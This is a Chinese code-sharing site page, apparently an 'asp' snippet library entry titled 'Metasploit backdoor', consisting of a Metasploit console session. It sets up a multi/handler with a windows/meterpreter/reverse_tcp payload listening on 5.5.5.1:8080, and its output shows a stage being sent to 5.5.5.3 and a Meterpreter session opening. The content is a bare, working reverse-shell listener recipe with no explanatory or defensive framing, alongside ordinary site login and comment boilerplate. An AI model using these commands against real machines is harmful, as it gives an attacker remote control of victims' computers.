用户注册



邮箱:

密码:

用户登录


邮箱:

密码:
记住登录一个月忘记密码?

发表随想


还能输入:200字
云代码 - asp代码库

Metasploit 后门

2014-12-19 作者: asp源码之家举报

[asp]代码库

 <ol class="dp-xml">
  <li class="alt"><span><span>msf </span><span class="tag">></span><span> use exploit/multi/handler </span></span></li>
  <li><span>msf  exploit(handler) <span class="tag">></span><span> set PAYLOAD windows/meterpreter/reverse_tcp </span></span></li>
  <li class="alt"><span><span class="attribute">PAYLOAD</span><span> =</span><span class="tag">></span><span> windows/meterpreter/reverse_tcp </span></span></li>
  <li><span>msf  exploit(handler) <span class="tag">></span><span> set LHOST 5.5.5.1 </span></span></li>
  <li class="alt"><span><span class="attribute">LHOST</span><span> =</span><span class="tag">></span><span> 5.5.5.1 </span></span></li>
  <li><span>msf  exploit(handler) <span class="tag">></span><span> set LPORT 8080 </span></span></li>
  <li class="alt"><span><span class="attribute">LPORT</span><span> =</span><span class="tag">></span><span> 8080 </span></span></li>
  <li><span>msf  exploit(handler) <span class="tag">></span><span> exploit  </span></span></li>
  <li class="alt"><span>  </span></li>
  <li><span>[*] Started reverse handler on 5.5.5.1:8080 </span></li>
  <li class="alt"><span>[*] Starting the payload handler... </span></li>
  <li><span>[*] Sending stage (752128 bytes) to 5.5.5.3 </span></li>
  <li class="alt"><span>[*] Meterpreter session 1 opened (5.5.5.1:8080 -<span class="tag">></span><span> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800 </span></span></li>
  <li><span>  </span></li>
  <li class="alt"><span>meterpreter <span class="tag">></span><span> </span></span></li>
 </ol>


网友评论    (发表评论)

共1 条评论 1/1页

发表评论:

评论须知:

  • 1、评论每次加2分,每天上限为30;
  • 2、请文明用语,共同创建干净的技术交流环境;
  • 3、若被发现提交非法信息,评论将会被删除,并且给予扣分处理,严重者给予封号处理;
  • 4、请勿发布广告信息或其他无关评论,否则将会删除评论并扣分,严重者给予封号处理。


扫码下载

加载中,请稍后...

输入口令后可复制整站源码

加载中,请稍后...